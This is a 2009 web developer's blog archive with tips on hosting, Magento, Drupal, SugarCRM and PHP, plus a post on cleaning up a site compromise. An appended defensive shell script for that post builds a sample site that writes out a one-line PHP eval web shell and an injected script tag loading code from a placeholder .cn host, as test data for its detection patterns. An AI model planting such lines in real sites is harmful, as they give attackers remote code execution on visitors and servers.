Tuesday, December 29, 2009

Basic Hosting Information for Everyone who wants a website

Two posts back I covered the levels of hosting, however that didn't really meet the needs of most of my clients. So I went back to the drawing board and created an article that attempts to cover all the technical details you need for your first website in an accessible format.

Read it here.

Monday, December 21, 2009

Drupal Migration

Just moved a Drupal instance from a local dev server to a public production server. Was getting a 500 error but a little research showed that I needed to set a value in the .htaccess file - specifically

RewriteBase /

Monday, November 09, 2009

This diagram displays the tiers of the system required for a website. When you have a website it is running on this stack.

First to define the tiers
E) Network and Power – physical network connection and power to run a server
D) Server hardware – the actual physical server (like your desktop PC)
C) Operating system – usually Linux or Windows – allows the other software to run on the hardware
B) Server Applications – on Linux (LAMP) this usually includes Apache, MySQL, and PHP. These pieces are the final level needed to run the website itself.
A) Website / Applications – this includes the website itself and required applications like Joomla or WordPress

Now let us take a look at some various hosting options.

1) Full Hosting. In this case you provide A-E
2) Co-location. In this case you buy the E from a provider. You then buy a Physical Server and they install it at their location. If something goes wrong with the network they fix it. A-D is your responsibility. You get the server all to yourself.
3) Dedicated Server. In this case you are leasing a server from them (D-E). If something goes wrong with the hardware, they fix it. You get the Physical Server all to yourself. A-C is your responsibility.
4) Virtual Private Server (VPS). In this case they have a server and you are buying a piece of it. They set the operating system. Everything above this point is your responsibility. Physical Server is shared – usually between 20 and 100 other users. Often they will also have a standard set of Server Applications that cannot be changed. Usually you can install applications. So you are responsible for A and maybe part of B. They provide B-E.
5) Shared Hosting. In this case you are leasing space on a server. They set almost everything. Sometimes you get terminal (SSH) access but usually not. You cannot install any applications. You share space on a physical server with usually 100-500 other users. You are responsible for A. They provide B-E
6) Application hosting. In this case the application is installed for you. You cannot create any new pages. You can use the specific application. You are responsible for the data. They provide A-E.

It is very important to note that each level is available through managed hosting and most are available as unmanaged hosting. What is the difference? Managed means the service provider takes care of administrative tasks. Unmanaged means it is up to you to take care of these issues. For example at the server level. If it is unmanaged then if a fan fails it is up to you to get it fixed. If it is managed – they will take care of fixing it.

1) Hardware firewall - position (Z) - Some providers offer a dedicated firewall solution. Often a Cisco or Juniper device.
2) Server Firewall - position X
3) Application Firewall - position X/W (depending on the solution)
4) Redundancy - often located at position (Y) this allows the site to keep working even if a server fails. Not available in most packages - instead you must wait for server to be replaced and restored from backup.
5) Scalability – position varies – if your needs expand can you expand the services to match.
6) Backup - may be located at positions (Y - system image), (X - server instance image (if you have 100% of server doesn’t differ from Y)), (W - website backup), (V - website data backup) depending on what we are backing up and how. Most solutions offer limited backup options.

Very few people really desire to manage the whole thing or know how to do so. If that is you – then you will definitely want to choose Full Hosting as it gives you the maximum flexibility. This is where many medium and large corporations operate.

For the rest of us – we need to pick one of the other options. Which option you choose should primarily be dictated by what you need to get done. As you work your way through the options there are two things that change.

First is how much of the server is yours – as you can see with shared hosting you get around 0.5% of the server. On a VPS you may get 5%. On a dedicated server you get 100%. There are solutions available that allow you to use multiple servers. So how much of the server is yours.

The second thing that changes is your responsibility. As you get more and more of the server – you usually also get more of the responsibility for keeping it working. Increasing to a bigger package doesn’t just give you more resources – it also gives you more options and responsibility. If you want to scale up to more resources without additional responsibility then you must go with a managed solution. This is an add-on to many packages where the hosting provider takes care of some of the administrative burden for tiers that they would not normally cover for that package. For example on a dedicated server – you are in charge of the operating system, the server applications and the website. If you pay for managed hosting they will take care of some or all of these levels for you.

Thursday, October 22, 2009

Magento related products issue

I have been working off and on with a design shop getting a new Magento multi-store instance live. The latest issue is somewhat interesting. We are currently showing a 'Related Products' column and for one of the store instances there were no checkboxes available to select a related product - after a little bit of research I found that if the item is out of stock, the checkbox will not be displayed.
For Reference..

Thursday, September 24, 2009

Twitter profile pull

One of my friends wanted to pull profile data from twitter and asked for some basic code. I am posting the mockup as it might prove interesting to someone else.

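<?php
   // Mockup: pull a Twitter profile and its friends list as XML and render them as HTML.
   $output = $xml_content = '';
   $tw_name = 'jeremiahstover';
   $xml_content = simplexml_load_file("http://twitter.com/users/show.xml?screen_name=$tw_name");
   $xml_content2 = simplexml_load_file("http://twitter.com/statuses/friends/$tw_name.xml");

   // Stop if either feed could not be fetched or parsed.
   if ($xml_content === false || $xml_content2 === false) {
      die('Could not load the Twitter profile data.');
   }

   // The values come from a remote service, so escape them before placing them in HTML.
   function h($value) {
      return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
   }

   $output .= "
         <div class='tw_profile' style='border:1px solid black;'>
            <a href='". h($xml_content->url) ."'>
               <div class='avatar'>
                  <img src='". h($xml_content->profile_image_url) ."'>
               </div>
               <div class='avatar_title'>". h($xml_content->name) ."</div>
            </a>
            <div class='description'>". h($xml_content->description) ."</div>
            <div class='friends'>
               <i>  ";

   // One link per friend returned by the friends feed.
   foreach ($xml_content2 as $friend) {
      $name = h($friend->name);
      $url = h($friend->url);
      $output .= "<a href='$url'>$name</a><br>";
   }

   $output .= "</i>
            </div>
         </div>";

   echo $output;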


Monday, August 31, 2009

Local Instance of Magento

I have been playing with a local instance of Magento - working on a custom template. When running on Windows (through WAMP), to get login working there must be a dot in the base site name - thus http://localhost/magento will not work - instead install to and you have a dot in the name. This issue is related to the way that cookies are handled internally and will not present any difficulty on a publicly hosted site.

Monday, August 03, 2009

Hack attack

I have been fighting an attack on the integrity of my websites for a little over a year now. At first there was no information online, but as the attack has continued I have found a few other people that suffered from the same attack. I finally decided it was time to put in the effort to track the issue down and correct it.

The attack was a code insertion in the footer of my pages. The attack script apparently searches for </body> and inserts a little piece of JavaScript right before it. The JavaScript loads a file located on one of a series of servers in China (domainname.cn).

At this point I have a shell script that I am running sporadically - searching all files on my server for the telltale indicator. It compiles a list of the files - which I then send through a second shell script which removes the attack code.

It appears the attack originated with an old instance of phpBB - which I have removed. Once the attack was successful a series of backdoor scripts were uploaded - all of which accept a posted file and then eval it. (PHP local execution). I have a second script that is looking for all instances of eval and listing them in another file - this one has to be checked by hand at this point as I have not yet selected a unique identifier for the attacking code. Once this part is cleaned up I should be clear (finally), hopefully for a while.

I am pondering things I can do in a shared hosting environment that would make this kind of attack more difficult. The best I have thought of to date is to set up a pair of scripts to set my websites to 'read only' and to 'read write'. Each time I make an update I could then unlock the files, and when I was done I could lock it back down. Without paying for a VPS, this may be the best solution. Another option would be to run a daily cron job that scans all folders for files changed in the last 24 hours. Have it compile a list and email that list to me. This way I would be notified any time a file changes. I would have to tweak the settings as there are a couple of applications that I am running that make use of temporary files. Temp files would have to be scanned to make sure they were less than x days old (where x is about 2) and deleted once they are older than that. All to prevent the temp folders from being a useful attack vector.

I suspect there is a better approach to the problem than either one I have specified - even though I am on a shared hosting account. I will give it some more thought as I have time.
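
The checks described in this post, sketched as an added example (not the author's own scripts): a scan for the injected footer script, a list of eval() calls for manual review, a last-24-hours change report for cron, and the lock/unlock pair. The function names are hypothetical, and the injected-script pattern is an assumption, since the post does not give the exact indicator.

```shell
#!/bin/sh
# Added example: integrity checks for a web root on shared hosting.
# ASSUMPTION: the injected code is a <script src=...> pointing at a .cn host;
# adjust the pattern to the indicator actually found in your files.

# List files containing a remote <script> loaded from a .cn host.
find_injected() {
    grep -rlE "<script[^>]*src=[\"']?https?://[^\"'/ >]+\.cn[\"'/ >]" "$1" 2>/dev/null | sort
}

# List file:line for every eval( call in PHP files, for review by hand.
# Only the location is printed, never the matched (possibly hostile) code.
find_eval() {
    find "$1" -type f -name '*.php' -exec grep -nH 'eval[[:space:]]*(' {} + 2>/dev/null |
        cut -d: -f1,2 | sort
}

# List files modified within the last 24 hours.
find_recent() {
    find "$1" -type f -mtime -1 | sort
}

# 'read only' / 'read write' switches: drop or restore write permission.
lock_site()   { chmod -R a-w "$1"; }
unlock_site() { chmod -R u+w "$1"; }

# Build a small CONSTRUCTED sample site so the checks can be tried offline.
make_sample_site() {
    d=$(mktemp -d)
    printf '<html><body>ok</body></html>\n' > "$d/clean.html"
    printf '<html><body>hi<script src="http://domainname.cn/x.js"></script></body></html>\n' > "$d/index.html"
    printf '<?php eval($_POST["f"]); ?>\n' > "$d/up.php"
    printf '<?php echo "evaluate"; ?>\n' > "$d/page.php"
    touch -t 200901010000 "$d/clean.html" "$d/page.php"   # backdate the untouched files
    echo "$d"
}

# Report for a daily cron job; cron mails whatever the job prints.
audit() {
    echo "== injected script tags ==";   find_injected "$1"
    echo "== eval() calls to review =="; find_eval "$1"
    echo "== changed in last 24h ==";    find_recent "$1"
}

if [ $# -ge 1 ]; then audit "$1"; fi
```

Run it with the web root as its only argument. A change report is only useful if expected writers such as cache and temp directories are excluded or reviewed separately, as the post notes.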

Saturday, July 25, 2009

Wordpress template excerpt

I needed to add excerpt functionality to a custom WordPress theme and found the following article to be just the ticket.

Replacing Wordpress content with an excerpt without editing the theme files

Magento multi store granular permissions

Magento eCommerce allows granular permissions in their community edition. Granular permissions are accessed by creating a role and assigning users to roles. However the community edition's granular permissions apply to all stores in a multi-store install. For granular permissions per store instance on a single install you need to purchase Enterprise which costs $8,900+ per year.

Wednesday, July 22, 2009

PHP and type casting

I was going through some of my notes and found an issue that gave me some trouble. About a year ago I was working on a custom shopping cart, and ran into trouble with PHP's type casting. I was multiplying a float (price) by an int (quantity) and PHP was converting the float to an int by dropping the decimal part of the number before doing the multiplication. Obviously this was causing trouble with the total price charged. The fix was to force the int to a float before the multiplication.
$lineTotal = (float) $price * $quantity;

Magento eCommerce

One of my clients is setting up a multi-store instance of Magento - and wanted to change each stores home page. I have not used Magento in a multi-store instance before so I had to look up the details.

Ok - here is what you want to know - I updated one of the stores - the required steps as follows
1) create a new page in the cms (named something like store-home)
2) If you have not already, create the new store
3) in admin open menu System->configuration
4) select box at top left - choose the entry 'english' under 'Maria's Botique'
5) left menu - choose 'web'
6) on right choose 'default pages'
7) modify the 'cms home page' by choosing the custom page we created in step 1
8) done

My reference material can be found here

Saturday, July 18, 2009


One of my clients is implementing an instance of SugarCRM - they recently set up several webToLead forms and wanted to require a set of fields other than the default. After poking around a little (on the documentation) I took a look at the page source. The solution proved quite simple.

<input id="req_id" name="req_id" value="first_name; last_name;webtolead_email1;" type="hidden">

As you can see - adding new id entries to the value of this field makes those fields required.
P.S. name and id appear to be set the same on every field - but the JavaScript appears to be using the id for verification.

Facebook advertising

One of my clients has decided to run a simple advertisement on Facebook - the stats so far are interesting. We chose to go with pay per impressions to start with. The ad links through to a page on Facebook, so there is a 'fan' link at the bottom of each ad.

Currently we are seeing
a) 1000 impressions per action
b) 1.8 actions per fan
c) 8 fans per person who follows one of the links on the Facebook page through to our website
d) 2 people on our website per 1 who fills out the form for the free promotional item.

This will bear watching to see how things develop as we attempt to tweak the settings

(UPDATE) We tried an ad that directed people to the website form directly instead of going through a Facebook page - all that seemed to do was drop us straight down to step c - which means fewer fans but the same number of website visits per advertising $.

Development challenge

I have recently been working on Joomla - running among other things an instance of Mosets tree 2.1. I have been working on a custom import from an external database. While you can get Mosets to rebuild its hierarchy using
this will not always manipulate your data into a form that Mosets can use.
I ran into trouble until I found that the root element must have an id of 0 and it must have a parent of -1. Any id other than 0 will not fail catastrophically, however it will not work properly either (I was seeing around 5% of the elements in the table showing up).

Desktop utility

I don't find myself using many Windows add-ons - but this one is actually proving useful.
Stardock Fences

Business counsel

Radical Career success in a down economy - just finished listening and found many interesting points. In my opinion just about any employee or entrepreneur can benefit from many of the concepts presented.